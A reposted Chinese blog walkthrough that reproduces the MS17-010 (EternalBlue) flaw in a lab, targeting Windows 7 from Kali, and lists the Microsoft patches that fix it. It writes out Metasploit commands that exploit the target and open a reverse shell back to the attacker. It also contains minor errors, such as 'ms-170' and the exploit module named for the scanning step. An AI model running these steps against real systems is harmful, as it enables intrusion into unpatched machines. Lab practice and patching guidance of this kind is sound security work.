本文講解有關MS17-010（永恒之藍）漏洞分析與復現

1.永恒之藍簡介

1、永恒之藍介紹:
永恒之藍漏洞（MS17-010），它的爆發源于 WannaCry 勒索病毒的誕生，該病毒是不法分子利用NSA（National Security Agency，美國國家安全局）泄露的漏洞 “EternalBlue”（永恒之藍）進行改造而成 。勒索病毒的肆虐，儼然是一場全球性互聯網災難，給廣大電腦用戶造成了巨大損失。據統計，全球100多個國家和地區超過10萬臺電腦遭到了勒索病毒攻擊、感染。

2、漏洞原理：
永恒之藍漏洞通過 TCP 的445和139端口，來利用 SMBv1 和 NBT 中的遠程代碼執行漏洞，通過惡意代碼掃描并攻擊開放445文件共享端口的 Windows 主機。只要用戶主機開機聯網，即可通過該漏洞控制用戶的主機。不法分子就能在其電腦或服務器中植入勒索病毒、竊取用戶隱私、遠程控制木馬等惡意程序。

3、影響版本：
目前已知受影響的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
————————————————
版權聲明：本文為CSDN博主「未完成的歌~」的原創文章，遵循CC 4.0 BY-SA版權協議，轉載請附上原文出處鏈接及本聲明。
原文鏈接：https://blog.csdn.net/qq_43531669/article/details/120375506

2.靶場環境準備

靶機：windows 7 Service Pack1

攻擊機：Kali GNU/Linux Rolling

?

3.漏洞復現

1.檢查靶機（win7）的防火墻是否關閉

?2.檢查靶機（win7）開啟遠程桌面

3.開始攻擊：執行漏洞掃描（包括探測445端口和掃描永恒之藍ms-170漏洞）?

可以看到ms170漏洞端口445目前是開啟狀態，而永恒之藍利用的就是445端口的SMB服務，操作系統溢出漏洞。

?使用MSF的永恒之藍漏洞模塊，對靶機進行掃描

打開MSF：msfconsole

搜索 ms17-010 代碼：search ms17_010

?

從掃描結果可以看出，結果里得到一些工具，其中：
auxiliary/scanner/smb/smb_ms17_010? ? ? ? ? 是永恒之藍掃描模塊， exploit/windows/smb/ms17_010_eternalblue 是永恒之藍攻擊模塊。
本次流程是先掃描探測漏洞，然后進行漏洞利用。

使用ms-170進行漏洞掃描，流程如下：

1.使用模塊use exploit/windows/smb/ms17_010_eternalblue

2.設置靶機ip?set rhosts 192.168.3.121

3.設置靶機端口 set rport 445（默認就是445，如果nmap探測bios端口不是445的話，請變更）

?輸入show options可查看配置

然后輸入exploit或者run，執行模塊

?可以看到掃描結果中：Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601?

和靶場的操作系統是完全吻合的。

下一步：漏洞利用，使用ms17-010攻擊模塊，對靶機進行攻擊

之前使用的是掃描模塊auxiliary/scanner/smb/smb_ms17_010

現在使用漏洞利用模塊exploit/windows/smb/ms17_010_eternalblue

1.use exploit/windows/smb/ms17_010_eternalblue

?2.設置靶機ip和攻擊機ip（接收反彈的shell）

set rhosts 192.168.3.121 靶機ip

set lhost 192.168.3.50? 攻擊機kali ip

set lport 903 攻擊機kali 監聽端口

?然后輸入show option查看配置

執行攻擊：exploit 或 run

?可以看到已經在kali機上生成一個靶機的shell交互界面

輸入ipconfig

?數字正常顯示，但是部分英文字符亂碼，此時輸入chcp 65001 可解決亂碼問題

?到此，永恒之藍漏洞復現完畢，下一步可以進行內網滲透，橫向信息收集等

4.漏洞修復方案

1.關閉bios服務，或開啟防火墻，屏蔽服務端口

2.給系統打上永恒之藍的漏洞修復補丁

MS17010補丁列表
不同版本的操作系統對應的MS17-010補丁編號如下
winxp特別補丁KB4012598
winxp3 32位 Security Update for Windows XP SP3 (KB4012598)
winxp2 64位 Security Update for Windows XP SP2 for x64-based Systems (KB4012598)

win2003特別補丁KB4012598
2003SP2 32位 Security Update for Windows Server 2003 (KB4012598)
2003SP2 64位 Security Update for Windows Server 2003 for x64-based Systems (KB4012598)

win2008R2補丁 KB4012212、KB4012215
March, 2017 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows Server 2008 R2 for x64-based Systems (KB4012215)

win7補丁 KB4012212、KB4012215
win7 32位
March, 2017 Security Only Quality Update for Windows 7 (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows 7 (KB4012215)
win7 64位
March, 2017 Security Only Quality Update for Windows 7 for x64-based Systems (KB4012212)
March, 2017 Security Monthly Quality Rollup for Windows 7 for x64-based Systems (KB4012215)

win10 1607補丁 KB4013429
win10 1607 32位
Cumulative Update for Windows 10 Version 1607 (KB4013429)
win10 1607 64位
Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4013429)

win2012R2補丁 KB4012213、KB4012216
March, 2017 Security Only Quality Update for Windows Server 2012 R2 (KB4012213)
March, 2017 Security Monthly Quality Rollup for Windows Server 2012 R2 (KB4012216)

win2016補丁 KB4013429
Cumulative Update for Windows Server 2016 for x64-based Systems (KB4013429)

總結

以上是生活随笔為你收集整理的永恒之蓝漏洞复现（包括常见问题处理）和修复方案的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。